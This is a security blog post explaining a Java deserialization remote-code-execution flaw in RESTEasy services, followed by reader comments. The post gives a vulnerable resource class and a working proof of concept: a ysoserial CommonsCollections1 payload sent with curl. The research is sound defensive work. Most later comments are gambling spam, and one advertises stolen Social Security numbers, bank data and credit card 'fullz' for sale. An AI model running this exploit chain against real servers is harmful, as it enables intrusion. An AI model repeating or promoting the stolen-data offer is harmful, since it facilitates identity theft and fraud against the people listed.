RESTEasy is RedHat project for building REST services in Java. You can deploy and run RESTEasy services on various servlet containers, like Apache Tomcat, Jetty, Undertow etc. RESTEasy is included as a module in WildFly and Jboss J2EE servers.
In this post, I want to describe server-side bug, which I’ve found during assessing security of some project written in Java. This project had REST API that was built with RESTEasy.
I’ve written simple PoC application to demonstrate what can go wrong with RESTEasy services.
Consider the following JAX-RS resource class with name PoC_resource.
I’ve added Jackson2 dependency to pom.xml. To invoke doConcat method you should issue POST request to the path /concat and pass JSON that represents object of the class Pair in the request body. You should also pass application/json in Content-Type HTTP header.
Here is the command line to invoke doConcat method of JAX-RS resource PoC_resource.

My demo RESTEasy application has two features that make it vulnerable:
RESTEasy uses so-called “providers” to marshal request body into the parameter of JAX-RS method. For my application, there is Jackson2 provider to marshal JSON into “pair” parameter.
As you might guess, RESTEasy will pick the suitable provider for marshalling based on the Class of the parameter and the value of Content-Type HTTP header.
There are non-standard providers like Jackson2 or JAXB that you should add explicitly in pom.xml. However, there are standard providers, which are located inside org.jboss.resteasy.plugins.providers package of resteasy-jaxrs JAR (core RESTEasy library). The most interesting standard provider is, of course, org.jboss.resteasy.plugins.providers.SerializableProvider.
When RESTEasy handles the request, it observes what content types are allowed for JAX-RS method (what content types are specified in @Consumes annotation for JAX-RS resource and JAX-RS resource method). RESTEasy composes short list of providers that are suitable for marshaling based on what content types are allowed for JAX-RS method, and value of Content-Type HTTP header in request. Next it iterates over this list, and for each provider invokes isReadable() method. If isReadable() of some provider returns true, RESTEasy chooses that provider for marshalling. If none of the isReadable() methods return true, we will get HTTP response with code 415.
Here you can see the listing of isReadable() method for SerializableProvider.
To construct object from request body readFrom() method of SerializableProvider is invoked, which performs deserialization by calling readObject(). And we might have RCE, if there are “interesting” Java classes in the CLASSPATH.
First, I generate payload using ysoserial tool. Then I invoke doConcat method with curl and use Content-Type application/x-java-serialized-object.

I have remote code execution.

In this post, I want to describe server-side bug, which I’ve found during assessing security of some project written in Java. This project had REST API that was built with RESTEasy.
I’ve written simple PoC application to demonstrate what can go wrong with RESTEasy services.
Consider the following JAX-RS resource class with name PoC_resource.
package unsafe.jaxrs; import java.util.*; import javax.ws.rs.*; import javax.ws.rs.core.*; @Path("/") public class PoC_resource { @POST @Path("/concat") @Produces(MediaType.APPLICATION_JSON) @Consumes({"*/*"}) public MapThis class contains JAX-RS method with name doConcat that is available via /concat path. It accepts “pair” parameter of class Pair.doConcat(Pair pair) { HashMap result = new HashMap (); result.put("Result", pair.getP1() + pair.getP2()); return result; } }
I’ve added Jackson2 dependency to pom.xml. To invoke doConcat method you should issue POST request to the path /concat and pass JSON that represents object of the class Pair in the request body. You should also pass application/json in Content-Type HTTP header.
Here is the command line to invoke doConcat method of JAX-RS resource PoC_resource.
curl -i -s -k -X 'POST' \ -H 'Content-Type: application/json' \ --data-binary $'{\"p1\":\"a\",\"p2\":\"b\"}' \ 'http://127.0.0.1:8080/unsafe-jaxrs/concat'You should get similar answer.

My demo RESTEasy application has two features that make it vulnerable:
- Pair class is derived from java.io.Serializable.
- JAX-RS method doConcat has @Consumes({"*/*"}) annotation.
RESTEasy uses so-called “providers” to marshal request body into the parameter of JAX-RS method. For my application, there is Jackson2 provider to marshal JSON into “pair” parameter.
As you might guess, RESTEasy will pick the suitable provider for marshalling based on the Class of the parameter and the value of Content-Type HTTP header.
There are non-standard providers like Jackson2 or JAXB that you should add explicitly in pom.xml. However, there are standard providers, which are located inside org.jboss.resteasy.plugins.providers package of resteasy-jaxrs JAR (core RESTEasy library). The most interesting standard provider is, of course, org.jboss.resteasy.plugins.providers.SerializableProvider.
When RESTEasy handles the request, it observes what content types are allowed for JAX-RS method (what content types are specified in @Consumes annotation for JAX-RS resource and JAX-RS resource method). RESTEasy composes short list of providers that are suitable for marshaling based on what content types are allowed for JAX-RS method, and value of Content-Type HTTP header in request. Next it iterates over this list, and for each provider invokes isReadable() method. If isReadable() of some provider returns true, RESTEasy chooses that provider for marshalling. If none of the isReadable() methods return true, we will get HTTP response with code 415.
Here you can see the listing of isReadable() method for SerializableProvider.
public boolean isReadable(Class type, Type genericType, Annotation[] annotations, MediaType mediaType) { return (Serializable.class.isAssignableFrom(type)) && (APPLICATION_SERIALIZABLE_TYPE.getType().equals(mediaType.getType())) && (APPLICATION_SERIALIZABLE_TYPE.getSubtype().equals(mediaType.getSubtype())); }As you can observe in the listing, SerializableProvider is used for marshalling when parameter’s class is superclass of java.io.Serializable and Content-Type is equal to application/x-java-serialized-object.
To construct object from request body readFrom() method of SerializableProvider is invoked, which performs deserialization by calling readObject(). And we might have RCE, if there are “interesting” Java classes in the CLASSPATH.
public Serializable readFrom(ClassFor demonstration, I’ve added Apache Commons Collections 3.2.1 dependency in pom.xml.type, Type genericType, Annotation[] annotations, MediaType mediaType, MultivaluedMap httpHeaders, InputStream entityStream) throws IOException, WebApplicationException { BufferedInputStream bis = new BufferedInputStream(entityStream); ObjectInputStream ois = new ObjectInputStream(bis); try { return (Serializable)Serializable.class.cast(ois.readObject()); } catch (ClassNotFoundException e) { throw new WebApplicationException(e); } }
First, I generate payload using ysoserial tool. Then I invoke doConcat method with curl and use Content-Type application/x-java-serialized-object.
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections1 "curl 127.0.0.1:8888" > /tmp/payload curl -i -s -k -X 'POST' \ -H 'Content-Type: application/x-java-serialized-object' \ -H 'Expect:' \ --data-binary "@/tmp/payload" \ 'http://127.0.0.1:8080/unsafe-jaxrs/concat'

I have remote code execution.

Let’s summarize
For Pentesters. JAX-RS methods are vulnerable to “deserialization of untrusted data” bug when the following conditions are met:- Content type is not specified explicitly for JAX-RS method via @Consumes annotation or specified, but too broad (e.g. */*, application/*).
- JAX-RS method has parameter of class that is serializable.
Very interesting.
ОтветитьУдалитьI just added this to my todo : https://github.com/find-sec-bugs/find-sec-bugs/issues/198
Quick note: Jersey (which uses JAX-RS annotations) does not seems to support this by default. It does not stop people from being "creative". http://stackoverflow.com/questions/15074431/how-do-i-make-jersey-use-java-serialization
Hi Philippe!
УдалитьIt will be great if you add checks in Find Security Bugs.
Your are rights about Jersey, it does not contain built-in providers that make deserialization of user's input as it is with RESTEasy. However, it has kryo provider - https://jersey.java.net/project-info/2.23.1/jersey/project/jersey-media-kryo/dependencies.html.
If kryo provider is in the CLASSPATH, REST services that use Jersey might be vulnerable. Here is the nice post about kryo deserialization - https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-1-kryo.
Come on, it's not a bug, it's a feature.
ОтветитьУдалитьThe bug/vulnerability is in the library you use - Apache Commons collections (CVE-2015-6420). So it's unrelated to the REST implementation.
Nevertheless, I fully agree with you - The developers should always use the principle of least privilege and only allow input types they expect.
NAGAQQ | AGEN BANDARQ | BANDARQ ONLINE | ADUQ ONLINE | DOMINOQQ TERBAIK
ОтветитьУдалитьYang Merupakan Agen Bandarq, Domino 99, Dan Bandar Poker Online Terpercaya di asia hadir untuk anda semua dengan permainan permainan menarik dan bonus menarik untuk anda semua
Bonus yang diberikan NagaQQ :
* Bonus rollingan 0.5%,setiap senin di bagikannya
* Bonus Refferal 10% + 10%,seumur hidup
* Bonus Jackpot, yang dapat anda dapatkan dengan mudah
* Minimal Depo 15.000
* Minimal WD 20.000
Memegang Gelar atau title sebagai Agen BandarQ Terbaik di masanya
Games Yang di Hadirkan NagaQQ :
* Poker Online
* BandarQ
* Domino99
* Bandar Poker
* Bandar66
* Sakong
* Capsa Susun
* AduQ
* Perang Bacarrat (New Game)
Info Lebih lanjut Kunjungi :
Website : NAGAQQ
Facebook : NagaQQ Official
WHATSAPP : +855977509035
Line : Cs_nagaQQ
TELEGRAM : +855967014811
BACA JUGA BLOGSPORT KAMI YANG LAIN:
agen bandarq terbaik
Winner NagaQQ
Daftar NagaQQ
Agen Poker Online
PERMAINAN ONLINE TERBESAR DI INDONESIA
ОтветитьУдалитьWebsite paling ternama dan paling terpercaya di Asia ^^
Sistem pelayanan 24 Jam Non-Stop bersama dengan CS Berpengalaman respon tercepat :)
Memiliki 9 Jenis game yang sangat digemari oleh seluruh peminat poker / domino
Permainan Judi online yang menggunakan uang asli dan mendapatkan uang asli ^^
* Minimal Deposit : 20.000
* Minimal Withdraw : 20.000
* Deposit dan Withdraw 24 jam Non stop ( Kecuali Bank offline / gangguan )
* Bonus REFFERAL 15 % Seumur hidup tanpa syarat
* Bonus ROLLINGAN 0.3 % Dibagikan 5 hari 1 kali
* Proses Deposit & Withdraw PALING CEPAT
* Sistem keamanan Terbaru & Terjamin
* Poker Online Terpercaya
* Live chat yang Responsive
* Support lebih banyak bank LOKAL tersedia deposit via OVO dan PULSA TELKOMSEL serta XL
Contact Us
Website : SahabatQQ
WA 1 : +85515769793
WA 2 : +855972076840
LINE : SAHABATQQ
FACEBOOK : SahabatQQ Reborn
TWITTER : SahabatQQ
Blog : Cerita Dewasa
Daftar SahabatQQ
The MSME Ministry notified that Udyam Registration can be filed online based on self-declaration with no requirement to upload documents, papers, certificates or proof.
ОтветитьУдалитьUdyam Registration MSME
UDYAM Registration Process
GST Registration Process in India
MSME Registration In India
(Eligibility, Registration Process, Benefits, Schemes, Documents Required)
Benefits Under MSME Registration (Udyog Aadhaar)
A micro, small and medium enterprise (MSME) will now be known as Udyam Registration in India.
SEO Expert & Digital Marketing in India
Best Digital Marketing Company in India
Property Dealer In Sri Ganganagar Real estate, Property, Rental in Sri Ganganagar
Website Design and Development Company in USA
Hey Guys !
ОтветитьУдалитьUSA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information
**HEADERS IN LEADS**
First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term deal
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Pussy888 Download
ОтветитьУдалитьทำไมต้องเลือกใช้บริการ Pussy888 หลายๆท่านอาจมีข้อสงสัยว่าทำไม จึงจะต้องเลือกใช้บริการ เว็บคาสิโนออนไลน์ที่เป็นน้องใหม่อย่างเว็บคาสิโนออนไลน์ นั้นก็เพราะว่า เว็บคาสิโนออนไลน์น้องใหม่ของเรานั้น ถึงจะหน้าใหม่แต่ไม่อ่อนประสบการณ์ ทุนท่านจะได้เปิดโลกใหม่ โดยที่ไม่ต้องเบื่อบริการแบบเดิมๆ ที่มีความล่าช้า ติดปัญหาต่างๆมากมายในเว็บคาสิโนที่ท่านเคยสัมผัส ปัญหาเหล่านั้นเราได้เล็งเห็นแล้วนำมาพัฒนาปรับเปลี่ยน ให้ตรงกับความต้องการของนักลงทุนมืออาชีพ
ทำไมต้องเลือกใช้บริการ Pussy888 หลายๆท่านอาจมีข้อสงสัยว่าทำไม จึงจะต้องเลือกใช้บริการ เว็บคาสิโนออนไลน์ที่เป็นน้องใหม่อย่างเว็บคาสิโนออนไลน์ นั้นก็เพราะว่า เว็บคาสิโนออนไลน์น้องใหม่ของเรานั้น ถึงจะหน้าใหม่แต่ไม่อ่อนประสบการณ์ ทุนท่านจะได้เปิดโลกใหม่ โดยที่ไม่ต้องเบื่อบริการแบบเดิมๆ ที่มีความล่าช้า ติดปัญหาต่างๆมากมายในเว็บคาสิโนที่ท่านเคยสัมผัส ปัญหาเหล่านั้นเราได้เล็งเห็นแล้วนำมาพัฒนาปรับเปลี่ยน ให้ตรงกับความต้องการของนักลงทุนมืออาชีพ
ОтветитьУдалитьทำไมต้องเลือกใช้บริการ Pussy888 หลายๆท่านอาจมีข้อสงสัยว่าทำไม จึงจะต้องเลือกใช้บริการ เว็บคาสิโนออนไลน์ที่เป็นน้องใหม่อย่างเว็บคาสิโนออนไลน์ นั้นก็เพราะว่า เว็บคาสิโนออนไลน์น้องใหม่ของเรานั้น ถึงจะหน้าใหม่แต่ไม่อ่อนประสบการณ์ ทุนท่านจะได้เปิดโลกใหม่ โดยที่ไม่ต้องเบื่อบริการแบบเดิมๆ ที่มีความล่าช้า ติดปัญหาต่างๆมากมายในเว็บคาสิโนที่ท่านเคยสัมผัส ปัญหาเหล่านั้นเราได้เล็งเห็นแล้วนำมาพัฒนาปรับเปลี่ยน ให้ตรงกับความต้องการของนักลงทุนมืออาชีพ
ОтветитьУдалить